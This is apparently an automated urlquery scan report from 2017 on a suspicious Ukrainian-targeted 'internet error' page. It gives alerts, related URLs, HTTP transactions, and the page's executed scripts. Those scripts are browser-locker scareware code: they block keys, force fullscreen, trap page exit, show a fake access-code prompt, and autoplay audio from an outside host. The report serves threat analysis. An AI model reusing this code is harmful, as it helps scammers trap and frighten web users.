Overview

URL oshibka-interneta.bbsindex.com/4369/102/ua.php
IP37.1.206.130
ASNAS50673 Serverius Holding B.V.
Location Netherlands
Report completed2017-09-01 06:25:50 CEST
StatusLoading report..
urlquery Alerts DynDNS domain detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Severity Source IP Destination IP Alert
2017-09-01 06:25:06 CEST 2 Client IP  37.1.206.130 ET INFO DYNAMIC_DNS HTTP Request to a *.bbsindex.com Domain


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter  No alerts detected
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 2 reports on IP: 37.1.206.130

Date UQ / IDS / BL URL IP
2017-09-01 01:54:27 +0200
6 - 0 - 0 oshibka-interneta.bbsindex.com/4369/102/ua.php 37.1.206.130
2017-08-21 23:28:59 +0200
3 - 3 - 0 gov-mvs-ua.4irc.com/121ua/ua.php 37.1.206.130

Last 10 reports on ASN: AS50673 Serverius Holding B.V.

Date UQ / IDS / BL URL IP
2019-06-26 13:06:17 +0200
0 - 0 - 38 https://naijaextra.com/ 93.158.208.37
2019-06-26 06:30:14 +0200
0 - 0 - 0 vkpornodepfile.com 37.1.205.41
2019-06-26 00:56:16 +0200
0 - 0 - 0 5.45.79.15/input/?mark=20190619-togwebwp.azur (...) 5.45.79.15
2019-06-25 17:18:28 +0200
0 - 0 - 0 tre.tithis.com 185.53.163.220
2019-06-25 04:02:54 +0200
0 - 0 - 0 5.45.79.15/input/?mark=20190623-www.relations (...) 5.45.79.15
2019-06-21 09:06:12 +0200
0 - 0 - 0 https://2conv.com/youtube-mp3/ 5.45.73.21
2019-06-21 04:13:19 +0200
0 - 0 - 1 5.45.79.15/input/?mark=20190620-www.rksoundse (...) 5.45.79.15
2019-06-20 11:26:05 +0200
0 - 0 - 0 teenphotoclub.net/ 5.45.67.187
2019-06-20 08:08:12 +0200
0 - 0 - 0 5.45.79.15/input/?mark=20190619-h2806836.stra (...) 5.45.79.15
2019-06-20 02:52:33 +0200
0 - 0 - 1 www.officesaceserver.net/login.php 5.255.86.108

No other reports on domain: bbsindex.com



JavaScript

Executed Scripts (21)


Executed Evals (10)

#1 JavaScript::Eval (size: 747, repeated: 1) - SHA256: 0074b430435a31b096d6bf538253c8055b7d472e0233c0b33881f2f9cb88dc15

                                              var on_div = document.getElementById("on");

      function cod() {
          onfocus = this.value == '2548B5 :>4 @071;>:8@>2:8...';
          on.innerHTML = '<font color="#6b6b6b">---</font>';
          setTimeout(function() {
              on.innerHTML = '<font color="#6b6b6b">--- ---</font>';
          }, 300);
          setTimeout(function() {
              on.innerHTML = '<font color="#6b6b6b">--- --- ---</font>';
          }, 600);
          setTimeout(function() {
              on.innerHTML = '<font color="#6b6b6b">--- --- --- ---</font>';
          }, 900);
          setTimeout(function() {
              on.innerHTML = '<font color="#6b6b6b">--- --- --- --- ---</font>';
          }, 1200);
          setTimeout(function() {
              on.innerHTML = '<font color="#c30000">2545= =525@=K9 :>4!</font>';
          }, 1500);
      }
                                    

#2 JavaScript::Eval (size: 410, repeated: 1) - SHA256: b8937ed987c41447e7fe794db35c4ecaae8d027b3f9a48fe40689a64311f15e7

                                            window.onkeydown = function(evt) {
        if (evt.keyCode == 27 || evt.keyCode == 18 || evt.keyCode == 123 || evt.keyCode == 85 || evt.keyCode == 9 || evt.keyCode == 115 || evt.keyCode == 116 || evt.keyCode == 112 || evt.keyCode == 114 || evt.keyCode == 17) {
            return false;
        }
    };
    window.onkeypress = function(evn) {
        if (evn.keyCode == 123 || evn.keyCode == 117) return false;
    };
                                    

#3 JavaScript::Eval (size: 129, repeated: 1) - SHA256: 1512d38f1de07a9ba9e19f7d64811213029986449c2a395695c828583d68680e

                                          onbeforeunload = function() {
          alert(""
              ESC, '"+  +", !" &#!");   return "" ESC, '
              "+  +", !" &#!";
          }
                                    

#4 JavaScript::Eval (size: 323, repeated: 1) - SHA256: f805bd55ffd272422c8e74f0953a6affd88e770e058edc6488db3e747417c626

                                        document.addEventListener('keyup', function(e) {
    if (e.keyCode == 122 || e.keyCode == 17 || e.keyCode == 18 || e.keyCode == 13) {
        toggleFullScreen();
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}, false);
                                    

#5 JavaScript::Eval (size: 267, repeated: 1) - SHA256: d4697b1ebe7683afd51a70f3354aaea8ed131210563f495298c1d2c1667b7fe0

                                        document.addEventListener('keyup', function(es) {
    if (es.keyCode == 27) {
        toggleFullScreen();
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}, false);
                                    

#6 JavaScript::Eval (size: 532, repeated: 1) - SHA256: 9b4aa32b6ee8f6da951ff72075972a13e0feedb60f0a95813300dae82c007b13

                                        function getDate() {
    var date = new Date();
    var hours = date.getHours();
    var minutes = date.getMinutes();
    var seconds = date.getSeconds();
    var day = date.getDate();
    var month = date.getMonth() + 1;
    var year = date.getFullYear();
    if (minutes < 10) {
        minutes = '0' + minutes;
    }
    if (seconds < 10) {
        seconds = '0' + seconds;
    }
    document.getElementById('timedisplay').innerHTML = hours + ':' + minutes + ':' + seconds + '<br>' + day + '.' + month + '.' + year;
}
setInterval(getDate, 0);
                                    

#7 JavaScript::Eval (size: 194, repeated: 1) - SHA256: fa7bb2f305a2c599655ebf5a2e8a90ad6d42e1cbafbddd96c6ee82f6e3ccb4fd

                                        function hello() {
    var p = document.getElementById('world');
    if (p.style.display == 'none') {
        p.style.display = 'block';
    } else {
        p.style.display = 'none';
    }
}
                                    

#8 JavaScript::Eval (size: 82, repeated: 1) - SHA256: eaad64e38398ebd625a861d33eb6c215ad5cbfbb9c1733359272d20633292b36

                                        function viewdiv(id) {
    var el = document.getElementById(id);
    el.style.display = "block";
}
                                    

#9 JavaScript::Eval (size: 523, repeated: 1) - SHA256: 50b0a678ce834ba30cb9d84636bf7376c03ce7d0bb2559cb270d657bd630fe0b

                                        if (key == 'jwsf72efuju2') {
    function toggleFullScreen() {
        if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
            if (document.documentElement.requestFullscreen) {
                document.documentElement.requestFullscreen();
            } else if (document.documentElement.mozRequestFullScreen) {
                document.documentElement.mozRequestFullScreen();
            } else if (document.documentElement.webkitRequestFullscreen) {
                document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
            }
        }
    }
}
                                    

#10 JavaScript::Eval (size: 502, repeated: 1) - SHA256: b5410693328b03022bf9114c99cbbc12b9bad402cb5d6d2bc803cea4c01c0607

                                        window.onload = function() {
    document.onclick = function(e) {
        e = e || event;
        target = e.target || e.srcElement;
        toggleFullScreen();
        document.body.style.cursor = 'not-allowed';
        document.getElementById('map').innerHTML = stroka;
        viewdiv('mydiv');
        viewdiv('mypanel');
        document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
    }
}
                                    

Executed Writes (0)



HTTP Transactions (8)


Request Response
                                        
                                            GET /4369/102/ua.php HTTP/1.1 
Host: oshibka-interneta.bbsindex.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.206.130
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Fri, 01 Sep 2017 04:25:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
X-Powered-By: PHP/5.4.34
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   257214
Md5:    478a9ea02dcd66751f084d336a2d95d2
Sha1:   3d41557e0e1563f381a93fbd694c8fc4aa892500
Sha256: 4c053624262e76657a13510c500c30321638c969060c4d11187a85aecf7befcd

Alerts:
  urlquery:
    - DynDNS domain detected
                                        
                                            GET /4369/102/aloha/pop.js HTTP/1.1 
Host: oshibka-interneta.bbsindex.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://oshibka-interneta.bbsindex.com/4369/102/ua.php

                                         
                                         37.1.206.130
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Fri, 01 Sep 2017 04:25:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Wed, 30 Aug 2017 08:49:08 GMT
Etag: W/"1ec9-589-557f499dde3a4"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   721
Md5:    541e68c03a7ba5ad0a25800b9162b43b
Sha1:   a2aedfaa49ce5e5cc3ea934793aec83ff5b36b57
Sha256: 4d3aa572dd8cfbe400b21b7bedbcd319ef9557ef8dc11d3905021c1086595a13

Alerts:
  urlquery:
    - DynDNS domain detected
                                        
                                            GET /4369/102/scripts.js HTTP/1.1 
Host: oshibka-interneta.bbsindex.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://oshibka-interneta.bbsindex.com/4369/102/ua.php

                                         
                                         37.1.206.130
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Server: nginx
Date: Fri, 01 Sep 2017 04:25:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Thu, 24 Aug 2017 03:01:29 GMT
Etag: W/"1daf8-f16-557770b7cb440"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1742
Md5:    7cb6c0dffa68faee978dab73873d2d78
Sha1:   ac774a8011475c33fb73e10a79dd82ea1f2423a6
Sha256: 4728008fea0275d1f3dc89088341c0d9d9a245ecd8bc2e9fec853e0511d915a5

Alerts:
  urlquery:
    - DynDNS domain detected
                                        
                                            GET /4369/102/pop.js HTTP/1.1 
Host: oshibka-interneta.bbsindex.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://oshibka-interneta.bbsindex.com/4369/102/ua.php

                                         
                                         37.1.206.130
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Server: nginx
Date: Fri, 01 Sep 2017 04:25:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Thu, 24 Aug 2017 03:01:29 GMT
Etag: W/"1daf6-3dbd1-557770b7cb440"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   73547
Md5:    3430df7738a446d5af890fe52cedc830
Sha1:   58b8dc9be64732d863554fc3935e8be5fe956545
Sha256: 3eba3f16e572c7fadcc60154af4bc73db1500dcdda1d5aadd1dc6ec49adc5c5f

Alerts:
  urlquery:
    - DynDNS domain detected
  IDS:
    - ET INFO DYNAMIC_DNS HTTP Request to a *.bbsindex.com Domain
                                        
                                            GET /analytics.js HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://oshibka-interneta.bbsindex.com/4369/102/ua.php
If-Modified-Since: Fri, 03 Oct 2014 00:48:42 GMT

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Fri, 01 Sep 2017 02:50:37 GMT
Expires: Fri, 01 Sep 2017 04:50:37 GMT
Last-Modified: Thu, 17 Aug 2017 01:11:09 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 13472
Cache-Control: public, max-age=7200
Age: 5670


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   13472
Md5:    b9b86922042a652c2ab95127f5d56fb1
Sha1:   ab415059ac440b2dc5aa4618e99df56b4f648222
Sha256: 9984b80ed589c69864d7fa2d664e83db447b4cafc4b7beeeea3c14a0818b519f
                                        
                                            GET /widgets.js HTTP/1.1 
Host: platform.twitter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://oshibka-interneta.bbsindex.com/4369/102/ua.php

                                         
                                         199.96.57.6
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Last-Modified: Wed, 23 Aug 2017 21:14:25 GMT
Cache-Control: public, max-age=1800
Etag: "83699f09f4bcebaa10462e1f37e208b4+gzip"
Content-Encoding: gzip
Content-Length: 33398
Accept-Ranges: bytes
Date: Fri, 01 Sep 2017 04:25:07 GMT
Via: 1.1 varnish
Age: 475
Connection: keep-alive
X-Served-By: cache-tw-sto1-2-TWSTO1
X-Cache: HIT
X-Timer: S1504239907.293150,VS0,VE0
Vary: Accept-Encoding,Host
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   33398
Md5:    0a1bc155cc34459fc2a6c9fd13b4cc3b
Sha1:   ddf696e15141d8c5668fef5774522eafce9e84a5
Sha256: ae2f022931dd9de12a185655c5067170a43277e9ea1d9eecee8920ea2a51afd3
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: oshibka-interneta.bbsindex.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.206.130
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Fri, 01 Sep 2017 04:25:08 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Wed, 30 Aug 2017 08:49:08 GMT
Etag: W/"1ec9-589-557f499dde3a4"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   721
Md5:    541e68c03a7ba5ad0a25800b9162b43b
Sha1:   a2aedfaa49ce5e5cc3ea934793aec83ff5b36b57
Sha256: 4d3aa572dd8cfbe400b21b7bedbcd319ef9557ef8dc11d3905021c1086595a13

Alerts:
  urlquery:
    - DynDNS domain detected
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: oshibka-interneta.bbsindex.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         37.1.206.130
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Fri, 01 Sep 2017 04:25:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Wed, 30 Aug 2017 08:49:08 GMT
Etag: W/"1ec9-589-557f499dde3a4"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   721
Md5:    541e68c03a7ba5ad0a25800b9162b43b
Sha1:   a2aedfaa49ce5e5cc3ea934793aec83ff5b36b57
Sha256: 4d3aa572dd8cfbe400b21b7bedbcd319ef9557ef8dc11d3905021c1086595a13

Alerts:
  urlquery:
    - DynDNS domain detected